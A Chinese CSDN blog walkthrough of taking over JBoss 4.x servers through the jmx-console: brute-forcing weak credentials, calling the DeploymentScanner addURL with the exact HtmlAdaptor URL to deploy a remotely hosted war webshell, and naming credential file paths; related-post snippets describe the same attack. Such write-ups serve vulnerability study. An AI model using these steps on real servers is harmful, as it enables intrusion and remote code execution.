Jboss 4.x版本jmx-console控制台弱口令getshell

最新推荐文章于 2023-10-13 00:56:33 发布
最新推荐文章于 2023-10-13 00:56:33 发布
阅读量2.5k 收藏 3
点赞数
分类专栏: 复现漏洞 文章标签: jboss4.0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/108318045
版权
总结:

1.发现jboss4.0,尝试弱口令,成功
2.直接访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
3.void addurl中的Param Value中插入公网部署好的war包
4.返回第二步,并点击apply changes
5.查看jmx-console目录下如果有部署war包的名字证明上传成功
6.ip/war包名字/脚本名字 连上马子

Jboss4.0版本界面
在这里插入图片描述

Jboss/jmx console登录进行抓包发现也是和tomcat一样base64编码,我们可以对这个编码暴力破解从而达到弱口令进入控制台
tomcat弱口令部署war包https://blog.csdn.net/weixin_41598660/article/details/107443373
在这里插入图片描述
其中JMX Console和JBoss Web Consoles是相同账号密码,但是JMX Console功能点会偏多

如果得到弱口令进入jmx console后点击jboss.deployment以下链接
在这里插入图片描述

然后在void addURL()选项来远程加载war包来部署。
在这里插入图片描述

War包是由shell.jsp生成的(这里很关键,因为会影响webshell的路径)
在这里插入图片描述

然后把war包放到公网上映射出来,如 http://ip:端口/aufeng.war, 然后在下面的功能点void add url中的Param vule中帖上war包公网的地址,然后点击invoke
在这里插入图片描述

就会有如下的页面,但不能确定是上传成功的
在这里插入图片描述

所以要回到之前回到flavor=URL,type=DeploymentScanner页面点击下属性列表中的"Apply change"
同用url地址

http://ip:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

在这里插入图片描述

然后等待的时间是有点长的,我当时是等了20分钟左右。在jmx-console目录下的deployment中的war包中如果能看到才能证明是上传成功
在这里插入图片描述

Webshell的地址是war包的名字+生成war包webshell的名字
成功连上冰歇马
在这里插入图片描述
在这里插入图片描述

jboss控制台用户密码(jmx-console)的路径
/jboss/jboss4/server/default/deploy/management/console-mgr.sar/web-console.war/WEB-INF/classes#

/opt/jboss/jboss4/server/default/conf/props/jmx-console-users.properties
在这里插入图片描述

努力的学渣'#
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jboss漏洞getshell
weixin_43999372的博客
11-07 1081
前言 最近感觉有点无聊,搞了国外一些站,学到一些知识,主要了解了windos中一些命令. 1.信息收集 首先访问该站,把目录扫描起,然后nmap扫描看看,然后找该站是否存在什么漏洞。然而并没有,扫描目录发现 8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/ 2.漏洞利用 全局...
Jboss控制台jmx-console的安全设置
04-22
Jboss控制台jmx-console的安全设置
删除JBOSS eap4.3下的jmx-console、web-console、ws-console、status服务
04-01
NULL 博文链接:https://iffiffj.iteye.com/blog/1404148
[原创]K8 Jboss jmx-console getshell exploit
weixin_30496431的博客
04-02 402
[原创]K8 Jboss jmx-console getshell exploit https://www.cnblogs.com/k8gege/p/10645858.html 0x00 前言 今天内网遇到几台Jboss,使用MSF确实是有点烦,要打几条命令设置一堆参数,我一个粘贴搞定的 为什么非要使用手动打好几条命令,让外行人看起来牛逼吗?大家都知道黑客电影打字快并不是高手 那些...
Jboss弱口令Getshell复现
懂进攻知防守
07-24 693
JBoss Administration Console存在默认账号密码admin/admin,如果Administration Console可以登录,就可以在后台部署war包getshell
Jboss未授权访问getshellJMX-Console
weixin_51151498的博客
12-10 1087
Jboss未授权访问getshellJMX-Console
Jboss getshell
aiguang4476的博客
05-08 3084
Jboss 的安装需要 JDK 环境 JDK+JBOSS 包 初始环境配置 系统变量名 变量值 PATH %JAVA_HOME%\bin;%JAVA_HOME%\jre\bin JAVA_HOME C:\Program Files (x86)\Java\jdk1.6.0_43 CLASSPATH .;%...
jboss-logging-3.4.1.Final-API文档-中文版.zip
06-06
赠送jar包:jboss-logging-3.4.1.Final.jar; 赠送原API文档:jboss-logging-3.4.1.Final-javadoc.jar; 赠送源代码:jboss-logging-3.4.1.Final-sources.jar; 赠送Maven依赖信息文件:jboss-logging-3.4.1.Final....
jboss-threads-3.1.0.Final-API文档-中文版.zip
05-09
赠送jar包:jboss-threads-3.1.0.Final.jar; 赠送原API文档:jboss-threads-3.1.0.Final-javadoc.jar; 赠送源代码:jboss-threads-3.1.0.Final-sources.jar; 赠送Maven依赖信息文件:jboss-threads-3.1.0.Final....
jboss-logging-3.4.3.Final-API文档-中文版.zip
05-09
赠送jar包:jboss-logging-3.4.3.Final.jar; 赠送原API文档:jboss-logging-3.4.3.Final-javadoc.jar; 赠送源代码:jboss-logging-3.4.3.Final-sources.jar; 赠送Maven依赖信息文件:jboss-logging-3.4.3.Final....
【实战】Jboss未授权访问(JMX-Console)Getshell
cj_Hydra's Blog
11-05 2504
都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。 GO: 访问地址:http://ip/JMX-Console 找到jboss.deployment 进入页面后找到void addURL() 此时部署我们远程的war木马,部署好了以后点击Invoke http:vpsIP地址/soft/cus.war 随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址 最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中 找到
JBoss未授权访问漏洞Getshell过程复现
道阻且长,行则将至。
06-21 3219
文章目录前言漏洞复现漏洞描述靶场搭建漏洞利用防御手段Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 GetShell 的漏洞场景(2021强网杯全国网络安全挑战赛Writeup),当时一脸懵圈,故在此进行学习记录下。 漏洞复现 JBoss 是一个管理 EJB 的容器和服务器,支持 EJB 1.1、EJB 2.0 和 EJB3 的规范。但 JBoss 核心服务不包括支持 servlet/JSP 的 WEB 容器,一般与 To
利用JBoss漏洞拿webshell方法
热门推荐
fengling132的专栏
08-15 1万+
JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell,由于是研究,因此仅仅点到为止。   一、信息收集与整理 1.使用漏洞特征进行搜索
一个简单探测jboss漏洞的工具
网络安全。
02-13 2918
0x01 项目介绍 自研工具。批量探测jboos系列漏洞路径,特别在内网渗透中,提高效率。(此工具仅探测漏洞所在路径,漏洞是否存还需对应exp验证。) 项目地址:https://github.com/GGyao/jbossScan 0x02 jboss漏洞介绍 CVE-2015-7501 JBoss JMXInvokerServlet 反序列化漏洞。此漏洞存在于JBoss中/invoker/JMX...
JBoss 未授权访问和弱口令复现
weixin_53747497的博客
02-21 1396
一个基于J2EE的开放源代码的应用服务器。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub。
jmx-console登录
iteye_20535的博客
10-31 698
参考:http://xiaoboss.iteye.com/blog/1113464 Jmx-console登录用户名密码设置: 默认情况下不需要用户名密码,但是存在安全隐患。 Jboss用户名密码设置步骤如下: 1. %JBOSS_HOME%/server/default/deploy/jmx-console.war/WEB-INF/jboss-web.xml中去掉java:/jaas...
jmx-console的配置
brainwkernighan的专栏
11-23 490
<br /> <br /> <br /> <br />i) server/default/deploy/jmx-console.war/web-inf:jboss-web.xml;web.xml<br />前者设置web应用的安全性域,后者设置登录的角色<br />ii)server/defualt/conf/login-conf.xml该文件存放一些与安全有关系的设置<br />从上面的xml中可以查看到配置用户名密码和权限的文件,默认为admin=admin
jboss--JMX Console未授权访问
最新发布
hovcfuti的博客
10-13 592
然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。若需登录,可以尝试爆破弱口令登录。返回JMX Console里面,刷新找到jboss.web.deployment,如果出现上传的war,则部署成功。
JBOSS启动报错Failed to start service jboss.web.deployment.default-host.
06-09
这个错误通常是由于在部署 Web 应用程序时出现问题引起的。您可以尝试以下步骤来解决此问题: 1. 检查应用程序的部署描述符(web.xml)文件是否正确配置了应用程序的上下文路径和Servlet 映射。 2. 检查应用程序是否有缺少的依赖项或库文件,并将其添加到应用程序的类路径中。 3. 检查应用程序的 WAR 文件是否已正确部署到 JBoss 的默认主机上。您可以在 JBoss 管理控制台中查看 WAR 文件的状态。 4. 检查 JBoss 的日志文件,了解更多有关错误的信息,并尝试解决它。 如果以上步骤无法解决问题,您可以尝试重新安装 JBoss 或使用其他 Web 服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值